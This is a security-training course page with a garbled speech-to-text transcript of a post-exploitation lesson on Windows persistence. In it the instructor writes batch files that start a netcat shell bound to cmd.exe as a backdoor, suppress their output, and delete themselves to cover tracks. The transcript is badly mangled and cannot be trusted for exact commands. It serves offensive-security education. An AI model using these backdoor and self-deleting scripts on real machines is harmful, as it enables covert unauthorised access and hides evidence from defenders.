Time
7 hours 47 minutes
Difficulty
Advanced
CEU/CPE
10

Video Description

This lesson focuses on creating batch scripts at the console and scheduling tasks so backdoors can be created as specific times. A batch script is a command typed at a Window but it's all in a single file. Participants learn step by step screen by screen instructions in using batch scripts to set up specific tasks.

Video Transcription

00:04
Hello, dear viewers. Welcome to persistence, continued access the post exploitation hacking course.
00:09
This video is going to be another Windows persistence and backdoor in course.
00:13
In this one, we're going to be discussing writing batch strips at the council and scheduling tasks.
00:19
So is to create back doors at
00:22
prearranged times. First thing that I want to discuss is match scripts. Bad scripts look like this.
00:29
Some name that that it's really
00:33
please. What I heard. Anything, not bat is a bad script. A bad script is nothing but commands that we would normally type
00:43
at the window.
00:45
But instead it's all in a single file
00:49
Now. There used to be a really handy Windows command called Edit. There was a command line editor. It still exists on everything up to Window seven and Window 7 32 bit.
00:59
However, if your own window 7 64 minute, it's not there.
01:02
When Microsoft, in their infinite wisdom, decided you didn't beat that,
01:06
so
01:07
we're left with kind of a pickle. We don't really know how to write toe a file from the command line.
01:12
However, there is one
01:14
way to do it.
01:15
Um, it is
01:18
sub optimal, and it's no one's favorite, but it does work,
01:22
and it's by using the copy command. So what we're gonna do is going to copy Con con is a user variable or an environment variable. That's map to counsel
01:30
council. Of course, being the thing that we're using right now,
01:34
copy Colin into
01:37
run script dot back
01:42
and you see it's
01:42
waiting for council entry.
01:45
So now we're gonna type C and tat.
01:48
Not yet. See
01:51
tech L k P one is revived
01:56
e Cindy dot e x e
02:00
enter.
02:02
Now that line is ready to be copied. Now notice you can't go back back space, does you? No. Good.
02:08
Which is why you gotta be careful editing.
02:10
Uh,
02:12
you can still back space in the land itself, but as soon as you hit enter, that is put on the buffer to be written to the file.
02:19
Now, the way you close this is my head in control Z and then on Mike machine because controls he isn't a proper interrupt. Sometimes
02:25
you hit enter and it says one file copied. Now, if you do endure,
02:30
if you do it here There we go. You see? Run scripts, not bat exists, right here
02:37
pretty small. And you can check it at any time to make sure that it is what we want
02:40
by doing the reverse of what we just did and doing a copy run script
02:46
con.
02:50
Now, if we do this, if we just execute run script not bad.
02:55
It prints that out, and then it starts a command line. It starts. Ah, n cat with access to the command line.
03:02
So we say. Okay, cool. That's a thing We're gonna end cat
03:07
XY local host
03:10
or 35
03:13
and written. Awesome.
03:15
That's not super quiet. It prints out what it's actually doing.
03:21
So
03:22
turning the bats job and we come up with something a little bit different, but it's actually pretty easy to do this
03:28
Gonna do. Copy, Run, script dot Bat con.
03:31
I'm sorry. We're in a new copy con Run, script out, Matt. Going completely over at this file, basically.
03:37
So it's actually not a bad idea to delete it. First
03:43
run. Script that bat,
03:46
though. All right, now we're going to copy con run scripts.
03:51
Now, First we're gonna do is an at echo off.
03:54
And that says don't repeat anything. I'm about to tell you just do what you're told and don't print anything to the screen unless something else is to do. So
04:03
Don't repeat my commands. Basically. Then we're gonna do see and cat, not XY.
04:10
Okay, p
04:12
five tacky cmdr DSC
04:15
and you will get very, very, very, very, very, very used to running a plant or really, all of these commands.
04:21
Obviously, there are actually, you know, better commands in there. Well, I shouldn't say better. There are other tools you'll probably get familiar with as you get more and more into this. But these beginner tools that we've gone over in these videos are gonna be the ones that you're really gonna want to get familiar with.
04:35
And they're the ones that you're going to be very familiar with before too long. So
04:40
do that.
04:42
And then we could do in echo on at the end if we want. But that's not really necessary.
04:47
And we've got
04:50
in your file.
04:51
So let's see the difference in running this one from running last one. So run script, a bat
04:58
silent
04:59
that much prettier
05:01
still does everything we want
05:05
so communicates
05:08
all is well,
05:15
what good does that do us or to be a little bit more straightforward.
05:19
What good does that do is going
05:21
on forever. We can create match scripts and we can give it special names. But what we want to do that? Why? You know why they would just spend five minutes learning how to write a bad script with this, innit?
05:31
The simple answer is because if we have a bad script,
05:34
where do you copy Con
05:38
test out back.
05:40
We'll be open with Adecco off
05:43
there. Do you see
05:45
and cat dot XY
05:46
Hello, K p
05:49
techie cmd, Dottie xy
05:55
And then whatever it finishes running that,
05:59
um
06:00
Well, actually and this is important because
06:02
I mentioned a moment ago
06:06
careful when you hit that enter key because that's not what I wanted. I shall put in that sea and cat.
06:15
We're gonna do this without K. So it's not going to be persistent is not going to keep the socket open
06:20
so we can connect to it. It will terminate the command. When we terminate the connection, it will end that command.
06:28
And then it could do other stuff.
06:30
For example, one of the things that can do
06:38
is delete itself. Now, why would we want to do that? Well,
06:41
there's the obvious reason,
06:44
which is that we can hide it. We can take this off the disc.
06:47
So you see, we've got this going now
06:50
and the connection
06:58
and we've got,
07:00
well, test. Not bad. It's still there, but we can actually take it out. And ah, we can write the batch jobs so that it ends and I could
07:08
I'll go in and edit my code so that
07:10
any code samples actually work into this. But we can go in and do things that are, like, delete this file when you're done executing whatever it is you're executing, or we can even go in there and,
07:19
you know, do the opposite direction. If we wanted to
07:23
try and delete it before
07:27
so at echo off.
07:29
See what?
07:32
Yes,
07:35
I'm going to go ahead and delete test out bad. Make sure we don't have any other files happening. Cool.
07:40
So, you know, for a fact test that bad has gone now,
07:43
so it can't be contest up bad.
07:48
All right, so let's see if it works this time. No guaranteeing that it will. This kind of ah,
07:54
and experience of testing and kind of guessing and checking as we go a little bit with scripting things like this. And it's kind of important that you go through the process
08:03
of, you know, having error, testing air, figuring out what's going on with it.
08:07
So we try, you know, test out back.
08:11
Can I bite our local host? We get that
08:13
and we exit
08:15
and we don't want to terminate the batch job.
08:18
So
08:20
wait a minute.
08:22
Why can't we terminate the batch job?
08:24
It deleted itself. Hey, look at that. It did its job
08:28
run script. Not bad, still there. But I was a different thing.
08:31
So
08:33
that's handy. Because now, if we only wanted the back door to be open for a moment or if we wanted to change without or anything like that, we see that we can put controls into the match scripts that will actually clear up our tracks after us. We're not actually in the clearing track section yet, but when we get there, you're gonna want scripts like that, things you can just drop on the target, just go to town.
08:52
This is very handy. Um,
08:56
in later cases, or, for example, I'll show you how
09:00
I will write up a batch script when I'll show you this in the final portion of this, where we actually go through and I just run my own
09:07
basic post exploit Siri's of steps. But I'll show you how with a single bath script, I collect all of the information that I want on a sheet,
09:16
and then I can start back during or even in some cases, I'll actually put the backdoor mechanism if I know what it is that I want Youse. I put that into play,
09:26
and so instead of running all of these different commands and taking all this time, do it.
09:30
I just activate one bad script. It takes into play, and
09:33
all of a sudden I got all the data.
09:35
So that's the bad scripts, and that's the important of that. Scripts, a CZ. Well, as the as you may have noticed
09:41
ease with which about script to be screwed up

Up Next

Post Exploitation Hacking

In this self-paced online training course, you will cover three main topics: Information Gathering, Backdooring and Covering Steps, how to use system specific tools to get general information, listener shells, metasploit and meterpreter scripting.

Instructed By

Instructor Profile Image
Joe Perry
Senior Technical Instructor at FireEye, Inc
Instructor